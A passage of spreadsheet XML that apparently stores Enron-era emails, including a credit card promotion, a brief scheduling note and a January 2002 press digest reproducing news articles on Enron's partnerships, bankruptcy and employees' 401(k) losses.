Why waste time with those other credit companies? NextCard offers 100%_x000D_
safe online shopping, 1-click bill payment, and 24-hour online account_x000D_
management.  Don't wait, apply now and get approval decisions in 30_x000D_
seconds or less. The choice is clear._x000D_
_x000D_
-------------------------------------------------_x000D_
_x000D_
This special promotion was a result of a partnership between_x000D_
TheStreet.com and Nextcard.  The email you have_x000D_
received was sent to you by TheStreet.com. Please be assured_x000D_
that we respect the privacy of our readers. To view our_x000D_
privacy policy, click here:_x000D_
http://www.thestreet.com/tsc/about/privacy.html_x000D_
_x000D_
If you would like to be excluded from receiving these types of_x000D_
offers in the future, please send an email to members@thestreet.com_x000D_
with the subject line "No Exclusive Offers."</t>
  </si>
  <si>
    <t>Fri, 17 Nov 2000 00:27:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: GE Breakout contract--Las Vegas Cogen</t>
  </si>
  <si>
    <t>Dale,_x000D_
_x000D_
What is your availability for a conference call with GE today?_x000D_
_x000D_
Kay</t>
  </si>
  <si>
    <t>Wed, 2 Jan 2002 08:59:55 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'sarah.palmer@enron.com'})</t>
  </si>
  <si>
    <t>Enron Mentions -- 01/02/02-12/31/01</t>
  </si>
  <si>
    <t xml:space="preserve">Documents Track Enron's Partnerships --- Top Officers Viewed Deals As Integ=_x000D_
ral to Ensuring Growth in Recent Years_x000D_
The Wall Street Journal, 01/02/2002_x000D_
_x000D_
Humbled Enron tries to save core business --- Accounting practices thrust i=_x000D_
nto spotlight_x000D_
Associated Press, 01/02/2002_x000D_
_x000D_
Shell Game; How Enron concealed losses, inflated earnings -- and hid secret=_x000D_
 deals. Are criminal charges next?_x000D_
Forbes Magazine, 01/07/2002_x000D_
_x000D_
Follow-Through_x000D_
Forbes Magazine, 01/07/2002_x000D_
_x000D_
The Disease! It's Spreading!; Enron_x000D_
Fortune Magazine, 01/07/2002_x000D_
_x000D_
When 401(k)s are KO'd_x000D_
Fortune Magazine, 01/07/2002_x000D_
_x000D_
The Boardroom Follies: In which we meet the non-stockholders, non- attender=_x000D_
s, and nonagenarians still among America's corporate directors._x000D_
Fortune Magazine, 01/07/2002_x000D_
One Plus One Makes What?; The accounting profession had a credibility probl=_x000D_
em before Enron. Now it has a crisis._x000D_
Fortune Magazine, 01/07/2002_x000D_
_x000D_
VOICE OF THE PEOPLE (letter)_x000D_
Enron's woes_x000D_
Chicago Tribune, 01/02/2002_x000D_
_x000D_
VOICE OF THE PEOPLE (letter)_x000D_
Executive actions_x000D_
Chicago Tribune, 01/02/2002_x000D_
_x000D_
You Mean, We Won Something? (Mumia Abu-Jamal, Enron)(Brief Article)_x000D_
The Nation, 01/07/2002_x000D_
_x000D_
CFA Largest Ch 11 Bankruptcy Filings Week Ended 12/28_x000D_
Dow Jones Corporate Filings Alert, 01/02/2002_x000D_
_x000D_
TXU CEO Ready As New Year Rings In Retail Deregulation_x000D_
Dow Jones News Service, 01/02/2002_x000D_
_x000D_
USA: Finance - Small steps seen improving financial health._x000D_
Reuters English News Service, 01/02/2002_x000D_
_x000D_
LME Base Metals Called To Open Dn On Comex Losses, Stocks_x000D_
Dow Jones Commodities Service, 01/02/2002_x000D_
_x000D_
US energy cos hoping to sell assets to reduce debts - report_x000D_
AFX News, 01/02/2002_x000D_
_x000D_
Master short seller raised flag on Enron: Roberts tags Kodak, Safeway as st=_x000D_
ocks to avoid_x000D_
Barron's, 01/02/2002_x000D_
_x000D_
SPANISH PRESS: Spanish Regulator Suspends Enron's License_x000D_
Dow Jones International News, 01/02/2002_x000D_
_x000D_
Enron's Dabhol Power draws suitors: Parent seeks US$1B_x000D_
Bloomberg, 01/02/2002_x000D_
_x000D_
GAS AUTHORITY OF INDIA TO BID FOR ENRON'S DABHOL POWER PROJECT_x000D_
Asia Pulse, 01/02/2002_x000D_
_x000D_
U.S. set to target earnings deception --- Test case thought likely this mon=_x000D_
th_x000D_
The Toronto Star, 01/02/2002_x000D_
_x000D_
J.P. Morgan Chase Sues Nine Insurers In Enron-Bond Case --- Institution See=_x000D_
ks to Quash Demands for Information_x000D_
The Wall Street Journal Europe, 01/02/2002_x000D_
_x000D_
J.P. MORGAN CHASE: Objects to insurers seeing Enron details_x000D_
Chicago Tribune, 01/01/2002_x000D_
Roll Over, Shakespeare, the Future of Jargon Is Here_x000D_
The New York Times, 01/02/2002_x000D_
_x000D_
Commentary: Enron Is a Cancer on the Presidency_x000D_
Los Angeles Times, 01/02/2002_x000D_
_x000D_
Career Journal: The Jungle_x000D_
The Wall Street Journal, 01/02/2002_x000D_
_x000D_
Dynegy's Reasons for Terminating Merger Were "Mere Pretexts," Says Enron_x000D_
Securities Litigation &amp; Regulation Reporter, 01/02/2002_x000D_
_x000D_
Shareholders Claim Enron Directors Made $434 Million in Insider Trading_x000D_
Securities Litigation &amp; Regulation Reporter, 01/02/2002_x000D_
_x000D_
American Electric Power buys Enron wind project_x000D_
The Milwaukee Journal Sentinel, 01/01/2002_x000D_
_x000D_
_x000D_
Enron hid behind smoke and mirrors_x000D_
South China Morning Post, 01/01/2002_x000D_
_x000D_
Letters To The Editor_x000D_
ENRON PROBLEMS WON'T HOLD NEW POWER DOWN_x000D_
The Columbus Dispatch, 01/01/2002_x000D_
_x000D_
The POWER of CHOICE / It is the dawning of deregulation in Texas, allowing =_x000D_
consumers to choose their electricity provider - and get a rate reduction a=_x000D_
s well._x000D_
Houston Chronicle, 01/01/2002_x000D_
Enron: The Lessons For Investors ; Hindsight, shmindsight. There's much to =_x000D_
learn when a stock loses $67 billion in value._x000D_
Money Magazine, 01/01/2002_x000D_
_x000D_
Edison Mission/Mirant -2: Deal Included Enron_x000D_
Bloomberg, 12/31/01_x000D_
_x000D_
___________________________________x000D_
_x000D_
Documents Track Enron's Partnerships --- Top Officers Viewed Deals As Integ=_x000D_
ral to Ensuring Growth in Recent Years_x000D_
By John R. Emshwiller_x000D_
Staff Reporter of The Wall Street Journal_x000D_
_x000D_
01/02/2002_x000D_
The Wall Street Journal_x000D_
A3_x000D_
(Copyright (c) 2002, Dow Jones &amp; Company, Inc.)_x000D_
_x000D_
As some current and former Enron Corp. officials try to distance themselves=_x000D_
 from controversial partnerships that played a role in the company's demise=_x000D_
, internal Enron documents show top management and directors viewed the par=_x000D_
tnerships as integral to maintaining the energy-trading giant's rapid growt=_x000D_
h in recent years.=20_x000D_
The documents also reinforce the notion that top Enron officials, including=_x000D_
 Chairman Kenneth Lay and former President Jeffrey Skilling, were directly =_x000D_
involved in the creation and oversight of the partnerships, which were run =_x000D_
by former Chief Financial Officer Andrew Fastow. Questions about the partne=_x000D_
rships in recent months contributed to a collapse in investor confidence in=_x000D_
 the Houston-based company, which just a year ago had a market capitalizati=_x000D_
on of over $60 billion. Enron filed last month for Chapter 11 bankruptcy-co=_x000D_
urt protection, which shields the company from creditors while it seeks to =_x000D_
reorganize._x000D_
An Enron spokeswoman said the company didn't have any comment on the docume=_x000D_
nts. Among these are an internal memorandum from an Enron attorney to Mr. S=_x000D_
killing regarding procedures for monitoring transactions with the partnersh=_x000D_
ips. The documents also include excerpts of minutes from meetings of Enron'=_x000D_
s board and the board's finance committee.=20_x000D_
Enron and Mr. Lay have consistently said that the company's dealings with t=_x000D_
he partnerships, which involved joint investments as well as asset sales, w=_x000D_
ere aimed at helping the company, were carefully reviewed to prevent confli=_x000D_
cts of interest and were adequately disclosed. The partnership dealings are=_x000D_
 the subject of a Securities and Exchange Commission probe and are being lo=_x000D_
oked into by Congress.=20_x000D_
The Enron documents indicate that in mid-1999 the company began using the p=_x000D_
artnerships to confront changing business conditions.=20_x000D_
A document excerpting a June 1999 board meeting cited Mr. Skilling as sayin=_x000D_
g that because of changing accounting rules affecting off-balance-sheet tra=_x000D_
nsactions, Enron had been analyzing new types of financing vehicles. Though=_x000D_
 the document doesn't provide further explanation, the statement would appe=_x000D_
ar to be a reference to a concern at Enron about trying to keep as much deb=_x000D_
t as possible off the company's balance sheet. Too much debt lowers a compa=_x000D_
ny's credit rating, which was a particular worry for Enron, whose vast ener=_x000D_
gy-trading operations relied heavily on its credit standing.=20_x000D_
In the June 1999 document, Messrs. Lay and Skilling were identified as bein=_x000D_
g designated by Enron's board to help ensure that the company received fair=_x000D_
 consideration in one of the early partnership deals.=20_x000D_
A draft version of minutes from an October 2000 meeting of the Enron board =_x000D_
finance committee cites Mr. Fastow speaking of the need for outside private=_x000D_
 partnerships to help manage the company's finances so that Enron could "co=_x000D_
ntinue to grow." Enron planned to continue making "significant capital inve=_x000D_
stments. . . . some of which would not generate cash flow or earnings for a=_x000D_
 number of years," the document said.=20_x000D_
Out of such needs were born in 1999 the so-called LJM partnerships, which w=_x000D_
ere run by Mr. Fastow. The Enron documents show that an early transaction i=_x000D_
nvolved the hedging of the value of an Enron investment in Rhythms NetConne=_x000D_
ctions Inc., a data-communications company. According to one document, Mr. =_x000D_
Fastow discussed how Enron could protect the value of that holding through =_x000D_
a complicated swap arrangement that also involved Enron stock and a $50 mil=_x000D_
lion LJM payment.=20_x000D_
In a filing last November with the SEC, Enron said that it had incorrectly =_x000D_
accounted for the Rhythms/LJM transaction. As a result, Enron retroactively=_x000D_
 reduced its reported net income for 1999 and 2000 by about $100 million, o=_x000D_
r around 5%.=20_x000D_
The internal documents show that the board and top management were aware of=_x000D_
 the possible conflicts of interests in having Enron's chief financial offi=_x000D_
cer running partnerships that eventually did hundreds of millions of dollar=_x000D_
s of business with the company. One document, labeled as part of a June 199=_x000D_
9 presentation to Enron's board, also laid out the huge profit potential in=_x000D_
 Mr. Fastow's partnership compensation formula, under which he stood to rea=_x000D_
p as much as half of partnership profits in addition to management fees. En=_x000D_
ron has estimated that Mr. Fastow made over $30 million from his partnershi=_x000D_
p activities.=20_x000D_
To avoid potential conflicts of interests on Mr. Fastow's part, Enron set u=_x000D_
p a review procedure for any Enron deals with the partnerships. Among other=_x000D_
 things, all transactions had to be approved by Mr. Skilling and two other =_x000D_
senior Enron officials, according to one of the company documents.=20_x000D_
In interviews with several media organizations last month, Mr. Skilling, wh=_x000D_
o resigned as Enron's president and chief executive officer in August, indi=_x000D_
cated that he wasn't fully aware of all the LJM-related dealings and was al=_x000D_
so surprised by the size of Mr. Fastow's partnership remuneration. Yesterda=_x000D_
y, a spokeswoman for Mr. Skilling said that while he was familiar with the =_x000D_
structure of the LJM partnerships, "he wasn't aware of or intimately involv=_x000D_
ed with details" of particular transactions. Those matters were "handled at=_x000D_
 a lower level" of the company, she added.=20_x000D_
Mr. Fastow couldn't be reached for comment. But a Fastow attorney has previ=_x000D_
ously pointed to Enron statements that all the LJM transactions were proper=_x000D_
 and approved by the board and top management._x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. =09_x000D_
_x000D_
Business_x000D_
Humbled Enron tries to save core business --- Accounting practices thrust i=_x000D_
nto spotlight_x000D_
Kristen Hays, Associated Press_x000D_
01/02/2002_x000D_
_x000D_
A humbled Enron Corp. will enter 2002 with hopes of emerging from bankruptc=_x000D_
y with a viable trading business, once the source of 90 per cent of its rev=_x000D_
enues.=20_x000D_
The once-mighty energy titan came crashing down with dizzying speed in 2001=_x000D_
 after investors lost confidence in the accounting behind its core operatio=_x000D_
ns._x000D_
The company is under investigation by the Securities and Exchange Commissio=_x000D_
n, the House or Representatives energy and commerce committee and the justi=_x000D_
ce department.=20_x000D_
On Jan. 10, an auction will be held of 51 per cent of Enron's wholesale ene=_x000D_
rgy trading operation. Some Wall Street insiders say bids could be as high =_x000D_
as $1 billion (U.S.) for the joint venture Enron has been trying to put tog=_x000D_
ether, enabling it to revive its oil, natural gas and electricity trading b=_x000D_
usiness.=20_x000D_
Enron was born in 1985 when Houston Natural Gas merged with InterNorth, a n=_x000D_
atural gas company based in Omaha, Neb. In 1989, Enron started trading natu=_x000D_
ral gas commodities and eventually became the world's largest buyer and sel=_x000D_
ler of natural gas.=20_x000D_
Later it gained fame by pioneering trading markets in such commodities as w=_x000D_
eather derivatives, telecommunications transmission capacity, pulp, paper a=_x000D_
nd plastics. But some of these units and overseas investments consistently =_x000D_
lost money.=20_x000D_
The company buried those losses in its profitable trading business and turn=_x000D_
ed to off-balance-sheet financing vehicles to keep burgeoning debt off its =_x000D_
books.=20_x000D_
But eventually, the debt and bad investments couldn't be hidden.=20_x000D_
On Oct. 16, Enron acknowledged $618 million (U.S.) in third-quarter losses,=_x000D_
 took a $1 billion charge for losses on bad investments and cut $1.2 billio=_x000D_
n in shareholders' equity.=20_x000D_
Enron filed for bankruptcy in New York Dec. 2 to keep creditors and lawsuit=_x000D_
s at bay so the company could try to preserve its trading operation. Money-=_x000D_
losing assets went up for sale.=20_x000D_
Credit rating agencies have promised closer scrutiny of off-balance-sheet f=_x000D_
inancing.=20_x000D_
"Enron is an animal all its own," said Credit Lyonnais analyst Gordon Howal=_x000D_
d. "A lot of companies have not handled their finances as aggressively as E=_x000D_
nron has. But one of the fallouts of Enron is that companies are going to h=_x000D_
ave to disclose a lot more than they have in the past."_x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. =09_x000D_
_x000D_
Company of the Year_x000D_
Shell Game; How Enron concealed losses, inflated earnings--and hid secret d=_x000D_
eals. Are criminal charges next?_x000D_
Daniel Fisher_x000D_
_x000D_
01/07/2002_x000D_
Forbes Magazine_x000D_
52_x000D_
Copyright 2002 Forbes Inc._x000D_
_x000D_
How Enron concealed losses, inflated earnings--and hid secret deals from th=_x000D_
e authorities. Are criminal charges next?=20_x000D_
Enron Corp.'s spectacular collapse may have shocked employees and investors=_x000D_
, who lost tens of billions of dollars. Could it have been a surprise to it=_x000D_
s top executives or its auditors, Arthur Andersen? The complex side bets an=_x000D_
d partnerships Enron used left it extremely vulnerable to a drop in its sto=_x000D_
ck price, its bond rating or the value of fiber-optic lines. The plunge of =_x000D_
all three doomed the company._x000D_
This much is apparent from some internal company documents leaked to FORBES=_x000D_
: As early as March 2001 the elaborate network of external partnerships Enr=_x000D_
on used to hedge against declining values of its assets was starting to mel=_x000D_
t down. Even as former chief executive Jeffrey Skilling and Chairman Kennet=_x000D_
h Lay were selling millions of dollars' worth of shares last spring, an arm=_x000D_
y of lawyers and accountants was shuttling money among partnerships to fore=_x000D_
stall disaster. They couldn't. Finally, in November, Lay admitted Enron had=_x000D_
 taken $710 million in losses to unwind the partnerships.=20_x000D_
Enron refuses to discuss the workings of these partnerships, beyond the sca=_x000D_
nty disclosures in the recent 10-Q filed with the Securities &amp; Exchange Com=_x000D_
mission. But documents laying out how some of the partnerships worked show =_x000D_
an ingenious structure designed by Enron's former chief financial officer, =_x000D_
Andrew Fastow. The idea was to use the value of Enron's rising stock price =_x000D_
to finance a welter of corporations that magically turned balance-sheet los=_x000D_
ses into gains on Enron's income statement. One round of partnerships forme=_x000D_
d last year hedged nearly $2 billion in Enron assets.=20_x000D_
The partnerships were originally designed to comply with regulation 140 of =_x000D_
the Financial Accounting Standards Board. The rule lets companies move fina=_x000D_
ncial assets off their balance sheets if they are put into entities that ar=_x000D_
e completely out of the control of the parent company. But Enron skirted th=_x000D_
e law by having the partnerships issue put options--obligations to buy some=_x000D_
thing in the future at a specified price--on assets that were still on Enro=_x000D_
n's books.=20_x000D_
"It's like somebody sat down with the rules and said, 'How can we get aroun=_x000D_
d them?'" says Douglas Carmichael, an accounting professor at Baruch Colleg=_x000D_
e in Manhattan. "They structured these things to comply with the letter of =_x000D_
the law but totally violated the spirit."=20_x000D_
Only Enron knows how many such partnerships exist. Carol Coale, an analyst =_x000D_
with Prudential Securities in Houston, has identified over 3,000 subsidiari=_x000D_
es and partnerships, many of them off-balance-sheet entities. Several were =_x000D_
designed to "monetize" assets--sell them to a party unlikely to question th=_x000D_
e value Enron put on them. Some deals require a complete suspension of disb=_x000D_
elief.=20_x000D_
In June 2000, for example, Enron sold $100 million worth of "dark fiber," o=_x000D_
r fiber-optic cables without the electronic gear necessary to transmit digi=_x000D_
tized information. The "buyer" was a partnership run by Fastow called LJM2 =_x000D_
(the acronym reportedly comes from the initials of his wife and children), =_x000D_
set up in 1999 to trade assets with Enron. On that deal, Enron booked a $67=_x000D_
 million profit, a significant piece of the $318 million gross profit the c=_x000D_
ompany reported for the broadband business in 2000. LJM2 later sold $40 mil=_x000D_
lion of the dark fiber to what Enron refers to as "industry participants," =_x000D_
and the remainder to another Enron-related partnership for $113 million in =_x000D_
December. What's curious is that the value of the fiber ostensibly increase=_x000D_
d 53% between June and December--during the same time that, in open markets=_x000D_
 at least, the value of dark fiber plunged by 67%. LJM2 reaped a $2.4 milli=_x000D_
on profit from the fiber trade, contributing to the $30 million of undisclo=_x000D_
sed gains the LJM partnerships delivered to Fastow, according to Enron.=20_x000D_
_x000D_
Shouldn't Enron's top management or its auditors have sought the identity o=_x000D_
f the buyers who so overpaid for the fiber asset? One wonders. And where, b=_x000D_
y the way, was all this fiber? That $100 million, say a fiber broker and an=_x000D_
 industry analyst, would have bought at least 33,000 miles of single-strand=_x000D_
 dark fiber in June 2000--enough to string up three nationwide networks--an=_x000D_
d considerably more by December. Enron's entire network, presumably consist=_x000D_
ing of multiple strands, was 18,000 miles at the time, with much of that fi=_x000D_
ber leased.=20_x000D_
The deal went undisclosed at a time when Skilling and Lay were talking up t=_x000D_
he great prospects for Enron's broadband business. There's something else t=_x000D_
hey neglected to mention. Enron provided what its current 10-Q calls "credi=_x000D_
t support" to the ultimate buyer, guaranteeing the debt. But if the partner=_x000D_
ship defaulted, Enron was on the hook for $61 million of the $67 million it=_x000D_
 booked as profits. Former employees say Enron's broadband business consist=_x000D_
ed largely of such questionable deals. To win a $20 million broadband servi=_x000D_
ces contract from Rice University in Houston, for example, Enron donated $5=_x000D_
 million to the school, and Ken Lay's personal foundation kicked in another=_x000D_
 $3 million. Unreported was the fact that Rice dropped the contract soon af=_x000D_
ter.=20_x000D_
The fiber deal finally came to light more than a year after it closed--in E=_x000D_
nron's 10-Q for the third quarter of 2001. Some of the most exotic deals re=_x000D_
main hidden in the files at Enron and its co-investors, files that disclose=_x000D_
 a welter of Delaware partnerships that Fastow formed in 2000 among Enron, =_x000D_
LJM2 and the so-called Raptor partnerships, which included trusts, limited =_x000D_
liability corporations and other entities through which cash, stock and der=_x000D_
ivatives cascaded.=20_x000D_
Code-named after Southwestern animals, these "special-purpose entities" wer=_x000D_
e curious beasts indeed. One of them, Bobcat, was capitalized with 6.3 mill=_x000D_
ion shares of Enron stock whose value was protected by a six-month put opti=_x000D_
on, expiring in mid-March of 2001, which Bobcat bought from Enron. The put =_x000D_
obligated Enron to buy its shares back at $68 each. Bobcat in turn sold put=_x000D_
s back to Enron, protecting it from declines in the value of various assets=_x000D_
.=20_x000D_
One of the weirdest aspects of these fancy derivatives: When an asset decli=_x000D_
ned in value, Enron was sometimes able to avoid booking the paper loss on t=_x000D_
he asset at the same time that it immediately counted the payout on the pro=_x000D_
tective put as income. Pure alchemy: Bad investments become profits on the =_x000D_
income statement.=20_x000D_
When Enron was trading at $80, Bobcat and its cubmates worked like magic. A=_x000D_
ny losses on derivatives sold to Enron were offset by an increase in the va=_x000D_
lue of their Enron stock. But as Enron shares fell below $68 in mid-March 2=_x000D_
001, Raptor deals started to fall apart. While Enron declines to comment on=_x000D_
 what happened next, present and former employees describe a mad scramble a=_x000D_
s the company tried to keep the elaborate structure Fastow created. Solvent=_x000D_
 partnerships had to prop up failing ones, while Enron executives continued=_x000D_
 to bail out of their employer's stock. Enron ultimately was forced to admi=_x000D_
t that Fastow's safety net had failed. The $532 million in hedging gains ge=_x000D_
nerated by the Raptors was wiped out by $710 million in losses created by t=_x000D_
heir collapse.=20_x000D_
At what point did Enron's top executives realize Fastow's edifice was crumb=_x000D_
ling? SEC attorneys are surely trying to find out.=20_x000D_
Pleading ignorance, as Andersen did before Congress, may not work. Market d=_x000D_
ata about falling values for international power plants and dark fiber was =_x000D_
readily available throughout the period Enron executives were reporting inf=_x000D_
lated values and selling some $1 billion in stock. That type of information=_x000D_
 can be used to establish that insiders sold stock knowing it was overvalue=_x000D_
d, says Jacob Frenkel, a defense lawyer with Smith, Gambrell &amp; Russell in W=_x000D_
ashington, D.C. and a former SEC enforcement attorney. "If you intentionall=_x000D_
y choose to be ignorant," he says, "that can satisfy the question of crimin=_x000D_
al intent."=20_x000D_
With additional reporting by Lynn Cook and Rob Wherry.=20_x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. =09_x000D_
_x000D_
Departments_x000D_
Follow-Through_x000D_
Rob Wherry, Seth Lubove, &amp; Carleen Hawn_x000D_
_x000D_
01/07/2002_x000D_
Forbes Magazine_x000D_
48_x000D_
Copyright 2002 Forbes Inc._x000D_
_x000D_
January 22, 2001-- Enron Fallout=20_x000D_
When we wrote about Calpine Corp. a year ago, the San Jose-based power prod=_x000D_
ucer's stock was trading at $47 despite the California energy crisis. But i=_x000D_
t hasn't been able to withstand the collateral damage resulting from the En=_x000D_
ron collapse in November. Investors are taking a second look at Calpine's a=_x000D_
mbitious plan to build and buy new plants. After a New York Times report co=_x000D_
mparing the company's "opaque" financial statements with Enron's and a Morg=_x000D_
an Stanley analyst's downgrading of Calpine's stock to neutral from strong =_x000D_
buy, Calpine shares have fallen to a recent $16. The road ahead for Calpine=_x000D_
 could be rough. Over the next 18 months it will need $3.9 billion to finis=_x000D_
h construction projects, refinance debt and support its trading business. C=_x000D_
alpine may have to dip into cash reserves to fund $1.8 billion of that amou=_x000D_
nt or, in a worst case scenario, leverage its gas reserves. It may also hav=_x000D_
e to renegotiate a lucrative long-term contract with the inept government o=_x000D_
f California, which in desperation last spring paid too much. Peter Cartwri=_x000D_
ght, Calpine founder and chief executive, has called the comparison with En=_x000D_
ron "ridiculous," and Robert Kelly, president of Calpine's financial subsid=_x000D_
iary, insists liquidity is not a problem. --Rob Wherry_x000D_
May 3, 1999Sinking Ship=20_x000D_
In our spotlight on how the federal government subsidized construction of l=_x000D_
uxury cruise liners, we explained that the Maritime Administration was guar=_x000D_
anteeing up to $1.1 billion in loans to American Classic Voyages. Controlle=_x000D_
d by billionaire Sam Zell, the company used the loans to build two huge shi=_x000D_
ps. In October the floating pork barrel finally sank. Zell's company filed =_x000D_
for bankruptcy, blaming the falloff in business after Sept. 11, though it h=_x000D_
ad been bleeding red ink long before the terrorist attacks. Among its liabi=_x000D_
lities: $211 million owed to the government. --Seth Lubove=20_x000D_
December 10, 2001Disconnect=20_x000D_
Two issues ago we explored a theory that AT&amp;T drove At Home, a broadband In=_x000D_
ternet provider it controlled, to bankruptcy as a way to get assets on the =_x000D_
cheap. Bondholders pointed to the lowball bid, $307 million, that AT&amp;T had =_x000D_
submitted to the bankruptcy court to buy At Home's subsidiary, ExciteAtHome=_x000D_
. But in early December AT&amp;T withdrew its bid. It appears it was scared awa=_x000D_
y by threats from At Home creditors to cut off service to more than half of=_x000D_
 AT&amp;T's 1.4 million cable customers. --Carleen Hawn_x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. =09_x000D_
_x000D_
First_x000D_
The Disease! It's Spreading!; Enron_x000D_
Bethany McLean_x000D_
_x000D_
01/07/2002_x000D_
Fortune Magazine_x000D_
Time Inc._x000D_
24_x000D_
(Copyright 2002)_x000D_
_x000D_
This isn't how it was supposed to work. After Enron declared bankruptcy in =_x000D_
early December, the other "energy merchants"--Wall Street's name for compan=_x000D_
ies like Dynegy, Calpine, and Mirant that are engaged in new businesses suc=_x000D_
h as trading power and building unregulated plants--disclaimed any sort of =_x000D_
Enronesque behavior. They also downplayed the aftershocks, reiterating prom=_x000D_
ises of big earnings growth and at times discussing how Enron's downfall wo=_x000D_
uld actually benefit them.=20_x000D_
Benefit? Not quite. Some of the "not-Enrons" have suffered huge stock price=_x000D_
 declines, with Mirant, the worst performer, losing 43% since late November=_x000D_
. And many have had to revamp their balance sheets. First came El Paso, whi=_x000D_
ch on Dec. 12 announced plans to sell more than $2 billion of assets, raise=_x000D_
 money in the equity market, and cut capital expenditures. A few days later=_x000D_
 Dynegy followed suit. Then came Williams, and finally, on Dec. 19, Mirant =_x000D_
joined the better- balance-sheet movement. Unfortunately this newfound reli=_x000D_
gion hasn't always satisfied the suddenly suspicious credit rating agencies=_x000D_
. Most notably, Moody's downgraded Mirant's debt to junk status._x000D_
Though none have proven themselves to be Enrons yet, the energy merchants d=_x000D_
o deserve some of this bad rap. They all have huge piles of debt, and like =_x000D_
Enron (and the dot-coms before that), they need the continued cooperation o=_x000D_
f the capital markets to fund their business plans. Last year widespread fe=_x000D_
ars of an energy shortage caused people to throw money at new power plants.=_x000D_
 And the spiking prices and massive volatility caused in large part by the =_x000D_
California crisis created big profit opportunities for traders. Now people =_x000D_
are concerned about an energy glut, and prices have fallen sharply. The eff=_x000D_
ects of all that (plus perhaps tougher accounting rules) on profits remain =_x000D_
unclear.=20_x000D_
Believers in the energy merchants insist that a healthier--albeit slower-gr=_x000D_
owth--industry will emerge from this. "Long-term prospects appear excellent=_x000D_
," wrote Goldman analyst David Fleischer in a recent note about Dynegy and =_x000D_
Williams. "Disarming the shorts!" said UBS Warburg's Ron Barone about El Pa=_x000D_
so's restructuring plans. (Note that Fleischer and Barone remained big Enro=_x000D_
n supporters until almost the last gasp.)=20_x000D_
This Wall Street babble won't amount to much; in the end these companies' p=_x000D_
rospects depend on the enthusiasm of the markets and flawless execution of =_x000D_
the restructuring plans. And since those plans rely in large part on asset =_x000D_
sales, it's worth asking: If everyone is selling, who's buying?_x000D_
_x000D_
COLOR ILLUSTRATION: MARTIN KOZLOWSKI=20_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. =09_x000D_
_x000D_
FORTUNE Advisor/Investing/Backlash_x000D_
When 401(k)s are KO'd_x000D_
Jeremy Kahn_x000D_
_x000D_
01/07/2002_x000D_
Fortune Magazine_x000D_
Time Inc._x000D_
104_x000D_
(Copyright 2002)_x000D_
_x000D_
Marie Thibaut spent 15 years as an administrative assistant at Enron in Hou=_x000D_
ston. During that time, she dutifully put 15% of her salary into a 401(k) p=_x000D_
lan, investing the entire amount in the company's rapidly climbing stock. E=_x000D_
nron then matched that investment with yet more shares. By the winter of 20=_x000D_
00, she had amassed close to $500,000 in stock and options, enough for the =_x000D_
61-year-old divorcee to begin contemplating early retirement. "My children =_x000D_
told me I should diversify," Thibaut says. "But all the mutual funds were g=_x000D_
oing down, and I just kept going up." She's not going up any longer. Today,=_x000D_
 Enron is bankrupt and Thibaut is out of work, a victim of one of the worst=_x000D_
 corporate collapses in history. Her 401(k) is worth just $22,000.=20_x000D_
That sorry tale has been repeated thousands of times at Enron, Lucent, Nort=_x000D_
el, and other companies whose stocks have cratered. But despite the punishi=_x000D_
ng market and calls for diversification, workers continue to pour a huge po=_x000D_
rtion of their retirement money into their employer's shares. Benefits cons=_x000D_
ulting firm Hewitt Associates estimates that as of Oct. 31, almost 30% of t=_x000D_
he $71 billion in assets in some 1.5 million 401(k) plans were invested in =_x000D_
the stock of the sponsoring company. At some places the proportion is even =_x000D_
higher. Microsoft employees keep 46% of their 401(k) funds in company stock=_x000D_
. At Enron, the figure was 62%. To make matters worse, many of these plans,=_x000D_
 like Enron's, restrict the sale of stock purchased with matching contribut=_x000D_
ions until employees are close to retirement._x000D_
Now legislators and pension-reform advocates are saying enough is enough. S=_x000D_
enators Barbara Boxer (D-California) and Jon Corzine (D-New Jersey) are spo=_x000D_
nsoring a bill that would force diversification by prohibiting any one stoc=_x000D_
k from making up more than 20% of a 401(k), reducing the tax breaks for com=_x000D_
panies that match 401(k) contributions with stock, and limiting to 90 days =_x000D_
the period a company can force employees to hold matching stock. Senator Je=_x000D_
ff Bingaman (D-New Mexico) also wants to allow companies to provide employe=_x000D_
es with investment advice without penalty. (Current law makes a company lia=_x000D_
ble for employees' investment decisions if it offers advice, and as a resul=_x000D_
t, few do.)=20_x000D_
The legislation won't necessarily pass without a fight. When Senator Boxer =_x000D_
attempted to pass a similar bill in 1996, lobbyists-- particularly those fr=_x000D_
om option-reliant Silicon Valley--succeeded in watering her proposal down t=_x000D_
o the point where it simply barred companies from forcing employees to inve=_x000D_
st more than 10% of their own contributions in company stock. There's also =_x000D_
the issue of companies matching 401(k) contributions with stock. Andrew Lia=_x000D_
zos, an attorney with McDermott Will &amp; Emery, says if this practice is rest=_x000D_
ricted, many companies may simply provide no match at all. Plus, he asks, i=_x000D_
sn't telling employees what to do with their retirement funds a bit paterna=_x000D_
listic?=20_x000D_
Pension-reform advocates say a little paternalism is just what is needed. "=_x000D_
It's unrealistic to think that without a new law employees will limit the a=_x000D_
mount of company stock they buy," says Eli Gottesdiener, a lawyer who is su=_x000D_
ing Enron and its accountants on behalf of its 401(k) participants. Given w=_x000D_
hat's happened at Enron, it'll be hard to counter that argument this time a=_x000D_
round.=20_x000D_
--Jeremy Kahn_x000D_
_x000D_
COLOR PHOTO: DAVID J. PHILLIP--AP When Enron collapsed, so did many a nest =_x000D_
egg.=20_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. =09_x000D_
_x000D_
First; Value Driven_x000D_
The Boardroom Follies: In which we meet the non-stockholders, non- attender=_x000D_
s, and nonagenarians still among America's corporate directors._x000D_
Geoffrey Colvin_x000D_
_x000D_
01/07/2002_x000D_
Fortune Magazine_x000D_
Time Inc._x000D_
32_x000D_
(Copyright 2002)_x000D_
_x000D_
The corporate disaster count seems to be going up, and it's worth asking wh=_x000D_
y. Not that we can tally these things precisely, but think of just the past=_x000D_
 few months: Enron, the biggest bankruptcy in history, with over $50 billio=_x000D_
n of shareholder wealth vaporized; Warnaco, another former highflier, with =_x000D_
shares that now cost less than a Snickers bar; the U.S. steel industry, whi=_x000D_
